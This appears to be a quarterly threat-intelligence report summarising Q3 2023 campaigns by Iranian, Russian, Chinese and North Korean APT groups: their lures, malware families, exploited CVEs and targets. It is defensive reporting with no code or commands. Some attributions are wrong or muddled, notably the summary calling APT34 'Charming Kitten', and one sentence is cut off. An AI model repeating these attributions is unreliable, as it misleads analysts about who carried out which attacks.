The third quarter of 2023 witnessed a surge in the dynamic and ever-evolving activities of Advanced Persistent Threat (APT) groups originating from various global regions, including China, North Korea, Iran, and Russia. These APT collectives have demonstrated remarkable adaptability and innovation, effectively challenging the global cybersecurity landscape.
In particular, Chinese APT groups, notably APT41, have showcased their agility by expanding their operations into the realm of mobile platforms. Furthermore, the Budworm group has significantly underscored the sophistication of Chinese APT operations through their advanced technical capabilities.
North Korean APT groups, typified by Kimsuky (APT43) and the Lazarus Group, continued to adapt, introducing novel tactics such as the use of LNK-format malware and spear-phishing campaigns. ScarCruft; a North Korean actor, has also contributed to the ever-evolving threat landscape by deploying malware with innovative deception techniques.
Iranian APT groups, with Charming Kitten as a prime example, engaged in multifaceted campaigns, targeting Iranian dissidents in Germany and exploiting vulnerabilities in Microsoft Exchange servers. Their introduction of new malware, including the Powerstar backdoor, and the adoption of the InterPlanetary File System, showcased their technological prowess.
Simultaneously, Russian APT29 set its sights on the Ministries of Foreign Affairs of NATO-aligned countries, utilizing the Duke malware and an evasive command-and-control system through Zulip, employing deceptive PDF documents that impersonated the German embassy.
This report provides a comprehensive summary of the activities observed and analyzed by CYFIRMA researchers from various active APT groups throughout Q3 2023. These activities underscore the ever-changing nature of APT operations on a global scale, highlighting the ongoing need for sustained vigilance, user education, and prompt software updates to effectively counter their persistent and agile actions in the cybersecurity landscape.
United Arab Emirates
Microsoft Exchange Servers
Social Media Apps
Remote monitoring and management tools
Individuals: Lawyers, Journalists, Human Right Activists
During the third quarter of 2023, Charming Kitten; a threat actor known for its cyber campaigns, was observed engaging in multifaceted activities. In August, the focus shifted towards Iranian dissident organizations and individuals residing in Germany, including lawyers, journalists, and human rights activists. Employing sophisticated social engineering techniques, the hackers crafted false personas tailored to their victims, establishing rapport to compromise targets. This campaign specifically aimed at infiltrating the Iranian opposition and exiles based in Germany.
The threat actor executed spear-phishing tactics to acquire sensitive information. Counterfeit messages, appearing legitimate, were sent to potential victims, with the objective of gaining access to their online services such as email accounts, cloud storage, or messenger services. The attackers meticulously explored the preferences and interests of their targets, including politically inclined interests. Subsequently, they initiated personal contact, creating a false sense of security before inviting the victim to an online video chat. During this interaction, victims were tricked into entering login details to a provided link, enabling the attacker to potentially access their online accounts.
In September, Charming Kitten expanded its focus to target unpatched Microsoft Exchange servers in Israel, Brazil, and the United Arab Emirates. The threat group gained initial access by exploiting known vulnerabilities in internet-exposed Microsoft Exchange servers. Conducting thorough scans of systems or networks, they identified weaknesses and vulnerabilities, subsequently targeting and exploiting them. The victims spanned various industries, including automotive, manufacturing, engineering, financial services, media, healthcare, technology, and telecommunications. The exploitation of the critical Exchange remote code execution vulnerability, CVE-2021-26855, played a pivotal role in gaining initial access.
Simultaneously, Charming Kitten, updated its malware arsenal in September. This upgrade involves an updated iteration of the Powerstar backdoor, also recognized as CharmPower. Notably, this malware incorporates advanced functionalities like the integration of the InterPlanetary File System. Additionally, its decryption function and configuration details are now hosted remotely on publicly.
In August, APT34 orchestrated a phishing attack utilizing a variant of the SideTwist Trojan. The decoy file employed for this operation was labeled “GGMS Overview.doc,” portraying an introduction to a fictitious company named “Ganjavi Global Marketing Services.” Concealed within the document’s malicious macrocode was the deployment mechanism for the Trojan. This macrocode extracted the Trojan SystemFailureReporter.exe, encoded in base64 format within the document, releasing it to the %LOCALAPPDATA%\SystemFailureReporter\ directory. A text file named update.xml was concurrently created in the same directory, serving as the trigger for the Trojan program. The malicious macro then established a scheduled task named SystemFailureReporter, summoning the Trojan every 5 minutes for repetitive execution. Notably, this Trojan variant, akin to the SideTwist Trojan in previous campaigns, differed by being compiled using GCC. Its primary functions included communication with the CnC, execution of commands from the CnC terminal, and uploading local files to the CnC. Distinctively, the Trojan lacked a cyclic or sleep mechanism and automatically exited after CnC communication, awaiting reinvocation by the scheduled task.
In a separate observed campaign in August, APT34 engaged in targeted phishing, utilizing the file “MyCv.doc,” seemingly a license registration form related to the Seychelles Licensing Authority. Curiously, the document contained pricing information in Saudi Riyal, suggesting the target was an organization within Saudi Arabia. This document was instrumental in deploying a new malware, Menorah, and establishing a scheduled task for persistence. Menorah, designed for cyberespionage, possessed capabilities to identify the machine, read and upload files, and download additional files or malware.
Simultaneously, OilRig (APT34), targeted government clients of an IT company in the Middle East for cyber espionage. Operating under the guise of a UAE-based IT company, the threat actors sent a recruitment form to the target. Upon opening the malicious document, presumably to apply for the advertised IT job, the victim triggered info-stealing malware. It is suspected that LinkedIn was exploited to deliver the job form, impersonating an IT company’s recruitment effort.
Peach Sandstorm (also known as APT33, Elfin, and Refined Kitten) employed password-spraying techniques from February to July 2023. This group exhibited a particular interest in the satellite, defense, and pharmaceutical sectors. While password spraying was the primary tactic, instances of vulnerability exploitation were noted, targeting remote code execution bugs in Zoho (CVE-2022-47966) and Confluence (CVE-2022-26134). In certain intrusions, APT33 utilized the commercial remote monitoring and management tool AnyDesk to maintain persistent access with the ultimate goal of stealing intelligence aligned with Iranian state interests.
The Iranian Advanced Persistent Threat (APT) landscape in Q3 2023 showcased a range of sophisticated campaigns. APT34, also known as Charming Kitten and OilRig, demonstrated a notable shift in tactics, employing advanced phishing attacks with variants of the SideTwist Trojan and Menorah malware. These campaigns targeted entities in the United States and Saudi Arabia, showcasing a geopolitical focus. Furthermore, the deceptive tactics extended to fake job recruitment efforts through LinkedIn, illustrating the group’s adaptability. Additionally, Peach Sandstorm (APT33) continued its cyber espionage activities, employing password spraying and exploiting vulnerabilities in sectors such as satellite, defense, and pharmaceuticals. The overarching objective remained the theft of sensitive information aligned with Iranian state interests.
NATO and aligned nations
Chat and collaborative software
Microsoft Exchange Servers
Open-source chat application
In Q3, APT29 came into focus for its strategic targeting of Ministries of Foreign Affairs in NATO-aligned nations. Employing the Duke malware, a tool associated with Russian state-sponsored cyber espionage attributed to APT29, this campaign exhibited the group’s proficiency. Notably, APT29 leveraged the open-source chat application; Zulip, for command-and-control purposes, employing this tactic to obscure its activities beneath the veneer of legitimate web traffic.
The modus operandi of APT29 involved the distribution of deceptive PDF documents that posed as correspondence from the German embassy. These documents were laced with invitation lures, cunningly designed to ensnare diplomatic entities. Two overarching themes, “Farewell to Ambassador of Germany” and “Day of German Unity,” were skillfully employed as bait in this campaign. This innovative approach underscored APT29’s adaptability and sophistication in orchestrating targeted cyber espionage operations.
In a concerning development during Q3, an infamous Russian cyberespionage group was identified as carrying out a damaging attack on a critical energy facility in Ukraine. The assailants employed a phishing email campaign as the initial entry point to compromise the targeted systems. The phishing email included three images, along with a seemingly innocuous message, “Hi! I talked to three girls, and they agreed. Their photos are in the archive; I suggest checking them out on the website.”
The deceptive archive, however, concealed a BAT (Batch) file, a type of Windows script used for automating tasks. When the unsuspecting victim executed this file, it triggered the opening of deceptive web pages designed to appear benign. Simultaneously, a malicious script was unleashed on the victim’s device, leading to catastrophic consequences. The aftermath of this onslaught resulted in severe damage to power plants, major transmission lines, and substations, causing daily blackouts that persisted for hours on end. The disturbing reality is that these blackouts may persist, as there are reports of Russia preparing its arsenal for potential future actions in this vein.
In the month of July, a threat actor with suspected ties to Russia, identified as RomCom, set its sights on entities that were actively supporting Ukraine, with a particular emphasis on attendees of the 2023 NATO Summit. This summit held critical discussions regarding the ongoing conflict in Ukraine and the potential inclusion of new member states, such as Sweden and Ukraine. Capitalizing on this pivotal event, RomCom devised a series of malicious documents, seemingly intended for distribution among pro-Ukraine supporters. RomCom likely leveraged spear-phishing techniques as part of its distribution strategy, with one of the malicious documents employing an embedded RTF file and OLE objects to initiate an infection sequence. This sequence was designed to extract system information and deliver the RomCom remote access trojan (RAT). At a crucial juncture in the infection chain, the threat actor exploited a vulnerability in Microsoft’s Support Diagnostic Tool (MSDT), recognized as CVE-2022-30190 or Follina, to achieve remote code execution (RCE).
The primary targets of this campaign appeared to be representatives from Ukraine, foreign entities, and individuals actively endorsing the Ukrainian cause. While RomCom was initially associated with financial motivations, recent shifts in their tactics and underlying motivations have raised suspicions of a potential alignment with the Russian government.
In July, the Russian state-sponsored hacking group; Turla, targeted the defense industry and Microsoft Exchange servers with a newly identified malware backdoor known as ‘DeliveryCheck.’ Their attacks began with phishing emails containing malicious macros hidden in Excel XLSM attachments. Upon activation, these macros executed a PowerShell command, creating a scheduled task disguised as a Firefox browser updater. This task, however, was responsible for downloading and launching the DeliveryCheck backdoor, allowing Turla to establish a connection to their command-and-control server for further instructions.
DeliveryCheck stands out due to its incorporation of a server-side component specifically designed for Microsoft Exchange servers, essentially converting the server into a command-and-control center for attackers. The primary objective of this campaign was to exfiltrate files containing messages from the Signal Desktop messaging application, potentially providing access to private Signal conversations, as well as various documents, images, and archive files on the compromised systems.
In Q3, Russian APT groups displayed heightened activity and sophistication across various campaigns. These included espionage operations targeting critical energy infrastructure in Ukraine, as well as an evolved Turla hacking group employing a new ‘DeliveryCheck’ malware backdoor. The exploitation of vulnerabilities in Microsoft Exchange servers was a common thread, allowing these threat actors to gain unauthorized access. Furthermore, Turla’s innovative use of Microsoft Exchange server-side components demonstrated an increased capacity for covert command and control. These developments emphasize the need for ongoing vigilance and security measures to counter evolving Russian APT activities.
Social engineering campaigns
United States of America
Email security gateway (ESG) appliances
In a significant development during July 2023, the Android surveillanceware, WyrmSpy and DragonEgg, was traced back to the Chinese espionage group APT41, also known as Double Dragon. APT41, which has been operating since 2012, has maintained an extensive global presence, targeting a wide array of organizations. Notably, the emergence of these malware instances represents APT41’s strategic expansion into mobile platforms.
WyrmSpy adopts a disguise as a system app, while DragonEgg conceals itself within third-party applications, often posing as keyboards or messaging apps. These deceptive tactics are coupled with requests for extensive device permissions and the utilization of additional modules designed for data exfiltration. APT41 leverages social engineering campaigns as a means of deploying these malware instances, and notably, none of these malicious apps have been identified on the official Google Play store, based on current detection.
The Budworm Advanced Persistent Threat (APT) group remains actively engaged in advancing its arsenal of cyber tools. In a recent discovery, it has come to light that Budworm deployed an updated version of one of its key tools, targeting both a Middle Eastern telecommunications organization and an Asian government, during August 2023. This latest campaign saw the utilization of a previously unseen variant of the SysUpdate backdoor (SysUpdate DLL inicore_v2.3.30.dll), equipped with a wide range of functions, including service control, screenshot capture, process management, and more. Notably, SysUpdate is a tool exclusive to Budworm, distinguishing it as a signature element of their operations. In addition to their custom malware, Budworm also employed a mix of living-off-the-land and publicly available tools in these targeted attacks, highlighting their adaptability and resourcefulness in carrying out their cyber campaigns.
In the world of cyber espionage, the Chinese hacker group; ‘Earth Lusca’, has come to the fore, targeting government agencies worldwide with their novel Linux backdoor; ‘SprySOCKS.’ This malware, originating from the Trochilus open-source Windows platform but adapted for Linux, exhibits a complex amalgamation of features, combining elements from RedLeaves and Derusbi. Operating throughout the first half of the year, Earth Lusca targeted government entities across Southeast Asia, Central Asia, the Balkans, and beyond. To infiltrate their targets, they used Cobalt Strike beacons to deploy the SprySOCKS loader; ‘mandibule,’ which concealed itself as ‘libmonitor.so.2,’ masquerading as a Linux kernel worker thread for stealth. Once embedded, the loader decrypted SprySOCKS, allowing the threat actors to access a multitude of capabilities, including system information gathering, interactive shell initiation, network connection listing, SOCKS proxy creation, and file operations. To mitigate the risk posed by Earth Lusca, organizations are urged to prioritize applying available security updates for their public-facing server products to deter initial compromise.
The Chinese APT group; UNC4841, demonstrated a high level of sophistication and strategic planning in their cyber operations during Q3. They successfully exploited a zero-day vulnerability (CVE-2023-2868, CVSS-9.8) in Barracuda Email Security Gateway (ESG) appliances, a campaign that had been ongoing since at least October 2022. Although Barracuda released patches in May, UNC4841 had already entrenched itself within some systems. This not only highlights their exceptional persistence but also suggests that they had prepared tooling and tactics to endure remediation efforts, ensuring continued access to high-value targets. Significantly, this operation, despite its global reach, was far from being opportunistic, underscoring UNC4841’s meticulous planning and substantial resources to anticipate and adapt to potential disruptions in their network access. Approximately 5% of ESG appliances were compromised, and following remediation attempts. UNC4841 escalated its activity by deploying new malware families such as SkipJack, DepthCharge, and Foxtrot/Foxglove backdoors. Their campaign primarily targeted governmental organizations, information technology and high-tech firms, telecommunication providers, manufacturing, and educational institutions. Notably, aerospace and defense, healthcare, biotechnology, public health, and semiconductor entities were also in their crosshairs. Many of the targeted government entities were in North America.
During Q3, the Chinese APT landscape presented a dynamic and tenacious profile. APT41 delved into mobile platforms, exemplifying their adaptability, while the Budworm APT group showcased an updated SysUpdate backdoor, underscoring their resourcefulness. Earth Lusca stood out by targeting global government agencies with the SprySOCKS Linux backdoor, demonstrating an intricate amalgamation of features from various malware strains. Meanwhile, UNC4841’s strategic planning was evident in their exploitation of a zero-day vulnerability in Barracuda Email Security Gateway appliances, allowing them to persist within high-value targets. Their actions highlighted the need for organizations to bolster their cybersecurity defenses.
Social engineering campaigns
United States of America
Social Media Platform
Fintech and cryptocurrency companies
SaaS – Supply chain attacks
In Q3, the North Korean APT group Kimsuky utilized a deceptive approach in their cyber activities. They distributed malicious batch files (*.bat), masquerading as document program viewers like Word and HWP, through email. Upon execution, these files feigned access to military or unification-related documents on Google Drive or Docs, creating the illusion of document viewing. However, these batch files had a nefarious purpose. They cunningly detected various anti-malware processes and initiated the download and execution of customized scripts for each case. For instance, when confronted with Kaspersky, the batch file replaced Word’s template file and ran a concealed cmd.exe. On the other hand, for Avast and Ahnlab processes, it downloaded scripts, altered browser and email shortcut files, and executed additional scripts. These covert tactics posed a substantial risk, potentially leading to malware infections and unauthorized system file manipulation.
Kimsuky continued to display an evolved modus operandi in Q3. In another observation their campaigns involved the utilization of Chrome Remote Desktop in tandem with their customized AppleSeed malware to take command of compromised systems. Spear phishing served as their initial attack vector, with malware concealed within document files distributed via email. Once a system was infected, Kimsuky proceeded to install an array of malware, including Infostealers, RDP Patchers for enabling multiple remote desktop sessions, and Ngrok for remote access. Notably, they harnessed Google’s Chrome Remote Desktop to facilitate remote control via a host program. Users are strongly advised to exercise caution when dealing with suspicious email attachments and maintain up-to-date software to mitigate the risk of infection.
In July, researchers uncovered a concerning supply chain compromise that targeted a US-based software solutions provider. This sophisticated attack originated from a spear phishing campaign directed at JumpCloud; a zero-trust directory platform service, integral to identity and access management. The intrusion was attributed to UNC4899, a threat actor associated with the Democratic People’s Republic of Korea (DPRK), known for its history of targeting cryptocurrency-related companies. These state-sponsored North Korean hacking groups have garnered ill fame for siphoning off billions of dollars globally, with the ill-gotten gains funneled into their nuclear missile program. Notably, this incident mirrors a previous supply chain attack on the enterprise office phone company; 3CX, earlier in the year, with both incidents allegedly linked to North Korean state-sponsored actors seeking cryptocurrency. This pattern underscores the adaptive nature of North Korean threat actors, continuously exploring innovative avenues for infiltrating targeted networks. The JumpCloud breach is a stark example of their inclination toward supply chain targeting, raising concerns about the potential for subsequent intrusions.
In another incident, researchers discovered a cyberattack by the Lazarus group on a Spanish aerospace company in late September 2023. The attack began with a LinkedIn message from a fake Meta recruiter, leading employees to execute malicious coding challenges that delivered a sophisticated backdoor known as LightlessCan. This RAT improves stealth and employs execution guardrails to thwart unauthorized decryption. The Lazarus group, linked to North Korea, is known for high-profile cyberattacks and has targeted aerospace companies for espionage, likely to gain access to aerospace technology and support missile development. The attack in Spain is attributed to Operation DreamJob.
In a notable strategic shift, ScarCruft; a threat actor associated with North Korea, has altered its tactics by adopting the distribution of malware in LNK format, departing from their previous use of CHM. This novel malware operates by executing scripts from a designated URL through the mshta process, enabling it to receive commands from the threat actor’s server for further nefarious actions. The lure for victims is a file named ‘Status Survey Table.xlsx.lnk,’ which cunningly conceals both a seemingly ordinary document and a concealed malicious script. Upon execution, this malware establishes persistence by making registry modifications and establishes connections with malicious servers. ScarCruft showcases a tendency to continuously modify its scripts, facilitating a range of malicious activities. Users are strongly advised to exercise caution, especially when encountering large LNK files from unverified or unknown sources.
North Korean APT groups have continued their sophisticated campaigns in Q3, exemplifying their adaptability and evolving tactics. Kimsuky (APT43) employed deceptive batch files to target systems, masquerading as document viewers. They leveraged Chrome Remote Desktop and AppleSeed malware for remote control, emphasizing the need for vigilance with email attachments. Lazarus Group (UNC4899) executed a supply chain compromise and targeted a US software provider, underscoring their inclination for innovative attack vectors. In a separate incident, they attacked a Spanish aerospace company through LinkedIn messages. ScarCruft introduced LNK-format malware, departing from their previous CHM tactic, necessitating user caution with suspicious file formats. North Korean threat actors persist as formidable cyber adversaries, showcasing ongoing evolution in their strategies.
Throughout the observed campaigns, Iranian threat actors primarily relied on spear-phishing emails to initiate their attacks, often followed by vulnerability exploitation and password-spraying techniques. Their primary targets remained Middle Eastern and European countries, where the aim was largely espionage. Meanwhile, Russian APT activities were notably associated with the ongoing armed conflict in Ukraine, focusing on both NATO countries and Ukraine itself. Their targets ranged from government institutions to critical industries. Chinese APTs expanded their reach to the Middle East, Asia, and critical infrastructure in the United States, with a noticeable expansion into mobile platforms. Lastly, North Korean APT groups strived to develop a robust nuclear triad, but limited resources prompted them to turn to cyber espionage, with a particular focus on maritime and aerospace technology acquisition.
These observations collectively underscore the ever-evolving nature of APT activities, highlighting the need for sustained vigilance, user education, and the rapid deployment of software updates as crucial defense mechanisms in the face of an agile and persistent threat landscape. As APT groups continually refine their techniques, maintaining an advantage in the realm of cybersecurity, it remains an ongoing challenge for both organizations and governments.